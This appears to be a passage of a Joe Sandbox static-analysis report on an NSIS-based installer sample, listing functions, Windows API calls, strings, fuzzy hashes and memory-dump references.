API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
String ID:
API String ID: 2320649405-0
Opcode ID: cedac81959eb3ef19a74f908d68e4e703a61b794166ebd5b231b869c6a402091
Instruction ID: 4d8d1a64c5805e8a020b3744e793f2033a9a6b6b0a681029562fed9dd316a9da
Opcode Fuzzy Hash: cedac81959eb3ef19a74f908d68e4e703a61b794166ebd5b231b869c6a402091
Instruction Fuzzy Hash: 722131715007049BCB319F68D948B5BBBF8AF81714B148A2EEE96E26E0D738D944CB54

Function 00405450 Relevance: 10.6, APIs: 7, Instructions: 72stringwindowCOMMON

Download Yara Rule

APIs

lstrlenW.KERNEL32(00422708,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402F08,00000000,?), ref: 00405488
lstrlenW.KERNEL32(00402F08,00422708,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402F08,00000000), ref: 00405498
lstrcatW.KERNEL32(00422708,00402F08,00402F08,00422708,00000000,00000000,00000000), ref: 004054AB
SetWindowTextW.USER32(00422708,00422708), ref: 004054BD
SendMessageW.USER32(?,00001004,00000000,00000000), ref: 004054E3
SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 004054FD
SendMessageW.USER32(?,00001013,?,00000000), ref: 0040550B

Memory Dump Source

Source File: 00000000.00000002.2377710882.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2377693270.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2377730412.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2377746542.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2377746542.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2377746542.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2377746542.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2377824191.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_2CQ2zMn0hb.jbxd

Similarity

API ID: MessageSend$lstrlen$TextWindowlstrcat
String ID:
API String ID: 2531174081-0
Opcode ID: d8bd542d8f5d0add287beae510a16995646733a1dc03fc5179ed0d48c47eb8dc
Instruction ID: e73fa1987b6059f35b704de59c80f6892b54c3d1ee51518932a2041d94d0b0cb
Opcode Fuzzy Hash: d8bd542d8f5d0add287beae510a16995646733a1dc03fc5179ed0d48c47eb8dc
Instruction Fuzzy Hash: BE21A171900558BACB119F95DD84ACFBFB5EF84314F10803AF904B22A1C3798A91CFA8

Function 0040667C Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 69COMMON

Download Yara Rule

APIs

CharNextW.USER32(?,*?|<>/":,00000000,00000000,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00435000,00403480,C:\Users\user\AppData\Local\Temp\,75923420,004036EF,?,00000006,00000008,0000000A), ref: 004066DF
CharNextW.USER32(?,?,?,00000000,?,00000006,00000008,0000000A), ref: 004066EE
CharNextW.USER32(?,00000000,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00435000,00403480,C:\Users\user\AppData\Local\Temp\,75923420,004036EF,?,00000006,00000008,0000000A), ref: 004066F3
CharPrevW.USER32(?,?,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00435000,00403480,C:\Users\user\AppData\Local\Temp\,75923420,004036EF,?,00000006,00000008,0000000A), ref: 00406706

Strings

C:\Users\user\AppData\Local\Temp\, xrefs: 0040667D, 00406682
*?|<>/":, xrefs: 004066CE

Memory Dump Source

Source File: 00000000.00000002.2377710882.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2377693270.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2377730412.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2377746542.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2377746542.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2377746542.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2377746542.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2377824191.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_2CQ2zMn0hb.jbxd

Similarity

API ID: Char$Next$Prev
String ID: *?|<>/":$C:\Users\user\AppData\Local\Temp\
API String ID: 589700163-1201062745
Opcode ID: 6f1dc59467bf7cdf849013f1baa50d92fe1cb62039c7f0915d7e3466f5f67e46
Instruction ID: ccb021e8c97aa0e4e9f296cc8cc4b0d2e06c32826977e33acd3911ee1a404cd3
Opcode Fuzzy Hash: 6f1dc59467bf7cdf849013f1baa50d92fe1cb62039c7f0915d7e3466f5f67e46
Instruction Fuzzy Hash: E011C82580061295DB302B548C44B77A2E8EF55764F52843FE985B32C1EB7D5CE28ABD

Function 00402E8E Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 51COMMON

Download Yara Rule

APIs

DestroyWindow.USER32(00000000,00000000), ref: 00402EA9
GetTickCount.KERNEL32 ref: 00402EC7
wsprintfW.USER32 ref: 00402EF5

Part of subcall function 00405450: lstrlenW.KERNEL32(00422708,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402F08,00000000,?), ref: 00405488
Part of subcall function 00405450: lstrlenW.KERNEL32(00402F08,00422708,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402F08,00000000), ref: 00405498
Part of subcall function 00405450: lstrcatW.KERNEL32(00422708,00402F08,00402F08,00422708,00000000,00000000,00000000), ref: 004054AB
Part of subcall function 00405450: SetWindowTextW.USER32(00422708,00422708), ref: 004054BD
Part of subcall function 00405450: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 004054E3
Part of subcall function 00405450: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 004054FD
Part of subcall function 00405450: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040550B

CreateDialogParamW.USER32(0000006F,00000000,00402DF3,00000000), ref: 00402F19
ShowWindow.USER32(00000000,00000005), ref: 00402F27

Part of subcall function 00402E72: MulDiv.KERNEL32(0001DFEE,00000064,000204C4), ref: 00402E87

Strings

... %d%%, xrefs: 00402EEF

Memory Dump Source

Source File: 00000000.00000002.2377710882.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2377693270.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2377730412.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2377746542.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2377746542.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2377746542.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2377746542.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2377824191.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_2CQ2zMn0hb.jbxd

Similarity

API ID: MessageSendWindow$lstrlen$CountCreateDestroyDialogParamShowTextTicklstrcatwsprintf
String ID: ... %d%%
API String ID: 722711167-2449383134
Opcode ID: c40ddff33436de44b244b2b19f9e8da7546f4e0328de08243a0837e5050f2c6b
Instruction ID: c65c9f61eb329069142d3a49436c3393aeffd9891ae55f37d91fa0e4ac25720a
Opcode Fuzzy Hash: c40ddff33436de44b244b2b19f9e8da7546f4e0328de08243a0837e5050f2c6b
Instruction Fuzzy Hash: 1A016170941614EBC7226B60EE4DA9B7B68BB01745B50413FF841F12E0CAB84459DBEE

Function 00404D1A Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00404D35
GetMessagePos.USER32 ref: 00404D3D
ScreenToClient.USER32(?,?), ref: 00404D57
SendMessageW.USER32(?,00001111,00000000,?), ref: 00404D69
SendMessageW.USER32(?,0000113E,00000000,?), ref: 00404D8F

Strings

f, xrefs: 00404D6B

Memory Dump Source

Source File: 00000000.00000002.2377710882.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2377693270.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2377730412.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2377746542.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2377746542.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2377746542.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2377746542.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2377824191.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_2CQ2zMn0hb.jbxd

Similarity

API ID: Message$Send$ClientScreen
String ID: f
API String ID: 41195575-1993550816
Opcode ID: e2d2d6aa42d138b4bf43a857dc2fb8cfa63f2fbdf5f441295addbf44c9bf4daa
Instruction ID: ac2b37e4453cd55ff3643614bd1240a9a451636028a825994647dd398b99f398
Opcode Fuzzy Hash: e2d2d6aa42d138b4bf43a857dc2fb8cfa63f2fbdf5f441295addbf44c9bf4daa
Instruction Fuzzy Hash: 23015E71940218BADB00DB94DD85FFEBBBCAF95711F10412BBA50F62D0D7B499018BA4

Function 00402DF3 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 36timeCOMMON

Download Yara Rule

APIs

SetTimer.USER32(?,00000001,000000FA,00000000), ref: 00402E11
wsprintfW.USER32 ref: 00402E45
SetWindowTextW.USER32(?,?), ref: 00402E55
SetDlgItemTextW.USER32(?,00000406,?), ref: 00402E67

Strings

unpacking data: %d%%, xrefs: 00402E33, 00402E43
verifying installer: %d%%, xrefs: 00402E3A

Memory Dump Source

Source File: 00000000.00000002.2377710882.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2377693270.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2377730412.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2377746542.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2377746542.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2377746542.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2377746542.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2377824191.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_2CQ2zMn0hb.jbxd

Similarity

API ID: Text$ItemTimerWindowwsprintf
String ID: unpacking data: %d%%$verifying installer: %d%%
API String ID: 1451636040-1158693248
Opcode ID: a591fce2f88080881549ac7e7473da6278debd618655821d08f98b44133a3158
Instruction ID: 1bfa7b94c56a1c823be81e007cf4dd9dcc28a4463181553f30e61efe61dd31fb
Opcode Fuzzy Hash: a591fce2f88080881549ac7e7473da6278debd618655821d08f98b44133a3158
Instruction Fuzzy Hash: 30F0317064020CABDF206F60DD4ABEE3B69EB40319F00803AFA45B51D0DBB999598F99

Function 6F972569 Relevance: 9.1, APIs: 6, Instructions: 109COMMON

Download Yara Rule

APIs

Part of subcall function 6F97121B: GlobalAlloc.KERNELBASE(00000040,?,6F97123B,?,6F9712DF,00000019,6F9711BE,-000000A0), ref: 6F971225

GlobalFree.KERNEL32(?), ref: 6F972657
GlobalFree.KERNEL32(00000000), ref: 6F97268C

Memory Dump Source

Source File: 00000000.00000002.2420870069.000000006F971000.00000020.00000001.01000000.00000004.sdmp, Offset: 6F970000, based on PE: true

Associated: 00000000.00000002.2420804552.000000006F970000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.2420903221.000000006F974000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.2420959726.000000006F976000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6f970000_2CQ2zMn0hb.jbxd

Similarity

API ID: Global$Free$Alloc
String ID:
API String ID: 1780285237-0
Opcode ID: f261d317266750affed246acaefd00cd64bb1436fa080e1c1cf280b535adabaf
Instruction ID: f64de98c2c158478d7a5b98748f0ef548b67ab32db57a6dff08c478c1e352772
Opcode Fuzzy Hash: f261d317266750affed246acaefd00cd64bb1436fa080e1c1cf280b535adabaf
Instruction Fuzzy Hash: 6031CB71928711DFDB348F68C898C2B7BBAFB87314310426BF241832A1CB31E9658F61

Function 004028AD Relevance: 9.1, APIs: 6, Instructions: 86memoryfileCOMMON

Download Yara Rule

APIs

GlobalAlloc.KERNEL32(00000040,?,00000000,40000000,00000002,00000000,00000000), ref: 00402901
GlobalAlloc.KERNEL32(00000040,?,00000000,?), ref: 0040291D
GlobalFree.KERNEL32(?), ref: 00402956
GlobalFree.KERNEL32(00000000), ref: 00402969
CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,000000F0), ref: 00402981
DeleteFileW.KERNEL32(?,00000000,40000000,00000002,00000000,00000000), ref: 00402995

Memory Dump Source

Source File: 00000000.00000002.2377710882.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2377693270.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2377730412.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2377746542.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2377746542.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2377746542.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2377746542.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2377824191.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_2CQ2zMn0hb.jbxd

Similarity

API ID: Global$AllocFree$CloseDeleteFileHandle
String ID:
API String ID: 2667972263-0
Opcode ID: ad54be54d1b33f2c3e643305ac3600c2e6c22dcacd93b56e136af0bf18fa41fc
Instruction ID: fa73a2a76dd28b4b8719808dd60f9f08d060129827b0ffc87b4efdc8f5ae5e12
Opcode Fuzzy Hash: ad54be54d1b33f2c3e643305ac3600c2e6c22dcacd93b56e136af0bf18fa41fc
Instruction Fuzzy Hash: 3D21BFB1D00124BBCF116FA5DE48D9E7E79EF09364F10023AF9607A2E1CB794D418B98

Function 00404C0C Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 84stringCOMMON

Download Yara Rule

APIs

lstrlenW.KERNEL32(00423728,00423728,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,00000000,00000400,?), ref: 00404CAD
wsprintfW.USER32 ref: 00404CB6
SetDlgItemTextW.USER32(?,00423728), ref: 00404CC9

Strings

(7B, xrefs: 00404C9F
%u.%u%s%s, xrefs: 00404C97

Memory Dump Source

Source File: 00000000.00000002.2377710882.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2377693270.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2377730412.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2377746542.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2377746542.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2377746542.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2377746542.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2377824191.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_2CQ2zMn0hb.jbxd

Similarity

API ID: ItemTextlstrlenwsprintf
String ID: %u.%u%s%s$(7B
API String ID: 3540041739-1320723960
Opcode ID: c06007edea0c83b5e0931fd45a2cd42dabd82a11b0b4461ae96ab8921206da46
Instruction ID: eedca0a42859d703ec1426aadcab00983e9769f6aa36ce56d5d2522b0312c54d
Opcode Fuzzy Hash: c06007edea0c83b5e0931fd45a2cd42dabd82a11b0b4461ae96ab8921206da46
Instruction Fuzzy Hash: A711D873A0412837EB00556DAC45EDE3298EB85374F254237FA26F31D1D9798C6282E8

Function 00402598 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 69stringCOMMON

Download Yara Rule

APIs

WideCharToMultiByte.KERNEL32(?,?,C:\Users\user\AppData\Local\Temp\nsf16D9.tmp,000000FF,C:\Users\user\AppData\Local\Temp\nsf16D9.tmp\System.dll,00000400,?,?,00000021), ref: 004025E8
lstrlenA.KERNEL32(C:\Users\user\AppData\Local\Temp\nsf16D9.tmp\System.dll,?,?,C:\Users\user\AppData\Local\Temp\nsf16D9.tmp,000000FF,C:\Users\user\AppData\Local\Temp\nsf16D9.tmp\System.dll,00000400,?,?,00000021), ref: 004025F3

Strings

C:\Users\user\AppData\Local\Temp\nsf16D9.tmp, xrefs: 004025E1
C:\Users\user\AppData\Local\Temp\nsf16D9.tmp\System.dll, xrefs: 004025B3, 004025DA, 004025EE, 0040263A

Memory Dump Source

Source File: 00000000.00000002.2377710882.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2377693270.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2377730412.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2377746542.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2377746542.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2377746542.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2377746542.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2377824191.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_2CQ2zMn0hb.jbxd

Similarity

API ID: ByteCharMultiWidelstrlen
String ID: C:\Users\user\AppData\Local\Temp\nsf16D9.tmp$C:\Users\user\AppData\Local\Temp\nsf16D9.tmp\System.dll
API String ID: 3109718747-159582160
Opcode ID: 2504939cc2fa207c3b55af63f84819462ffbd17dbd09f8919900b39cf6f986df
Instruction ID: c13fbae436403556d6c48d38c5ac6db5007ae9437622b5a65b164b2cac9ab4a1
Opcode Fuzzy Hash: 2504939cc2fa207c3b55af63f84819462ffbd17dbd09f8919900b39cf6f986df
Instruction Fuzzy Hash: FB110B72A00301BADB106BB18E8999F7664AF44359F20443BF502F21D0D9FC89416B5E

Function 6F9718D9 Relevance: 7.7, APIs: 5, Instructions: 194COMMON

Download Yara Rule

APIs

GlobalFree.KERNEL32(?), ref: 6F97193A
GlobalFree.KERNEL32(?), ref: 6F971ADA
GlobalFree.KERNEL32(?), ref: 6F971ADF

Memory Dump Source

Source File: 00000000.00000002.2420870069.000000006F971000.00000020.00000001.01000000.00000004.sdmp, Offset: 6F970000, based on PE: true

Associated: 00000000.00000002.2420804552.000000006F970000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.2420903221.000000006F974000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.2420959726.000000006F976000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6f970000_2CQ2zMn0hb.jbxd

Similarity

API ID: FreeGlobal
String ID:
API String ID: 2979337801-0
Opcode ID: de1d189ff9f6a5c963e689051e7e8e5413d3ba02d1c06a9a95e01dfb8d96b1a3
Instruction ID: 6320de7363b0a556c6686d7fad26104be245516d8d4479c9f8ff94afb31bf56a
Opcode Fuzzy Hash: de1d189ff9f6a5c963e689051e7e8e5413d3ba02d1c06a9a95e01dfb8d96b1a3
Instruction Fuzzy Hash: 3051A531D043599B8BB99FB889605AEB7B9EF47354B00425BD504A72C0EF70FEC18B95

Function 6F972394 Relevance: 7.6, APIs: 5, Instructions: 135memoryCOMMON

Download Yara Rule

APIs

GlobalFree.KERNEL32(00000000), ref: 6F9724D6

Part of subcall function 6F97122C: lstrcpynW.KERNEL32(00000000,?,6F9712DF,00000019,6F9711BE,-000000A0), ref: 6F97123C

GlobalAlloc.KERNEL32(00000040), ref: 6F97245C
WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,?,00000000,00000000), ref: 6F972477

Memory Dump Source

Source File: 00000000.00000002.2420870069.000000006F971000.00000020.00000001.01000000.00000004.sdmp, Offset: 6F970000, based on PE: true

Associated: 00000000.00000002.2420804552.000000006F970000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.2420903221.000000006F974000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.2420959726.000000006F976000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6f970000_2CQ2zMn0hb.jbxd

Similarity

API ID: Global$AllocByteCharFreeMultiWidelstrcpyn
String ID:
API String ID: 4216380887-0
Opcode ID: 7b77ef855e1076e410544303313961e4aaf87492d9f1721563c424540808fa9c
Instruction ID: 7158db371fb139b45a9d71710163d9d1ac3eb0b1a31da7f95535cae4b51b7a78
Opcode Fuzzy Hash: 7b77ef855e1076e410544303313961e4aaf87492d9f1721563c424540808fa9c
Instruction Fuzzy Hash: C941CAB0518705DFD7349F29D844A6A77F8FB9A720B004A5EE54A8A5C2EF30E484CF61

Function 00401DB9 Relevance: 7.5, APIs: 5, Instructions: 43COMMON

Download Yara Rule

APIs

GetDC.USER32(?), ref: 00401DBC
GetDeviceCaps.GDI32(00000000,0000005A), ref: 00401DD6
MulDiv.KERNEL32(00000000,00000000), ref: 00401DDE
ReleaseDC.USER32(?,00000000), ref: 00401DEF
CreateFontIndirectW.GDI32(0040CDD8), ref: 00401E3E

Memory Dump Source

Source File: 00000000.00000002.2377710882.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2377693270.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2377730412.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2377746542.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2377746542.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2377746542.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2377746542.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2377824191.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_2CQ2zMn0hb.jbxd

Similarity

API ID: CapsCreateDeviceFontIndirectRelease
String ID:
API String ID: 3808545654-0
Opcode ID: e8aeef341752f35f6f278e7796ab08014b9ac4723c71950966d24e93e9008032
Instruction ID: 863f18fc6204ba506076eb1f746ada73c94881a68b515e1873f2d1072bd1cf43
Opcode Fuzzy Hash: e8aeef341752f35f6f278e7796ab08014b9ac4723c71950966d24e93e9008032
Instruction Fuzzy Hash: 15017171944240EFE701ABB4AF8ABD97FB4AF55301F10457EE242F61E2CA7804459F2D

Function 6F97161D Relevance: 7.5, APIs: 5, Instructions: 41memorylibraryloaderCOMMON

Download Yara Rule

APIs

WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000000,00000000,00000000,00000808,00000000,?,00000000,6F9721EC,?,00000808), ref: 6F971635
GlobalAlloc.KERNEL32(00000040,00000000,?,00000000,6F9721EC,?,00000808), ref: 6F97163C
WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000000,00000000,00000000,?,00000000,6F9721EC,?,00000808), ref: 6F971650
GetProcAddress.KERNEL32(6F9721EC,00000000), ref: 6F971657
GlobalFree.KERNEL32(00000000), ref: 6F971660

Memory Dump Source

Source File: 00000000.00000002.2420870069.000000006F971000.00000020.00000001.01000000.00000004.sdmp, Offset: 6F970000, based on PE: true

Associated: 00000000.00000002.2420804552.000000006F970000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.2420903221.000000006F974000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.2420959726.000000006F976000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6f970000_2CQ2zMn0hb.jbxd

Similarity

API ID: ByteCharGlobalMultiWide$AddressAllocFreeProc
String ID:
API String ID: 1148316912-0
Opcode ID: b3e833d767e1a639ee4db644b8ecbb7c3a8ad9757f02ea9af9ab7b47fe7e9b9f
Instruction ID: 8bb4d06d7d6a45c73c3937e78bbe0f2426b748e52f40920c97e9c38da87274d0
Opcode Fuzzy Hash: b3e833d767e1a639ee4db644b8ecbb7c3a8ad9757f02ea9af9ab7b47fe7e9b9f
Instruction Fuzzy Hash: A1F0A27220A638BBDA2116AA8C4CC9B7E9CEF8B2F5B110215F6189119196615D11DFF1

Function 00401D5D Relevance: 7.5, APIs: 5, Instructions: 39windowCOMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?,?), ref: 00401D63
GetClientRect.USER32(00000000,?), ref: 00401D70
LoadImageW.USER32(?,00000000,?,?,?,?), ref: 00401D91
SendMessageW.USER32(00000000,00000172,?,00000000), ref: 00401D9F
DeleteObject.GDI32(00000000), ref: 00401DAE

Memory Dump Source

Source File: 00000000.00000002.2377710882.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2377693270.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2377730412.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2377746542.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2377746542.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2377746542.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2377746542.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2377824191.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_2CQ2zMn0hb.jbxd

Similarity

API ID: ClientDeleteImageItemLoadMessageObjectRectSend
String ID:
API String ID: 1849352358-0
Opcode ID: f8e0c1d3071f89bffdcd2d635822fb410905a1edc8d2ce6cb8a0a09a78f20d84
Instruction ID: 8bbc6a183a468c813578a114873fb97f9d5ca0b11dae6a70aa3aa56fe52826a6
Opcode Fuzzy Hash: f8e0c1d3071f89bffdcd2d635822fb410905a1edc8d2ce6cb8a0a09a78f20d84
Instruction Fuzzy Hash: 4BF0FF72A04518AFDB01DBE4DF88CEEB7BCEB48301B14047AF641F61A0CA749D519B38

Function 00401C1F Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84windowtimeCOMMON

Download Yara Rule

APIs

SendMessageTimeoutW.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401C8F
SendMessageW.USER32(00000000,00000000,?,?), ref: 00401CA7

Strings

!, xrefs: 00401C5B

Memory Dump Source

Source File: 00000000.00000002.2377710882.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2377693270.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2377730412.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2377746542.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2377746542.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2377746542.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2377746542.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2377824191.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_2CQ2zMn0hb.jbxd

Similarity

API ID: MessageSend$Timeout
String ID: !
API String ID: 1777923405-2657877971
Opcode ID: 204806375d4f16312a37781d02af86e184349cdc68ded53cac09897120414cdc
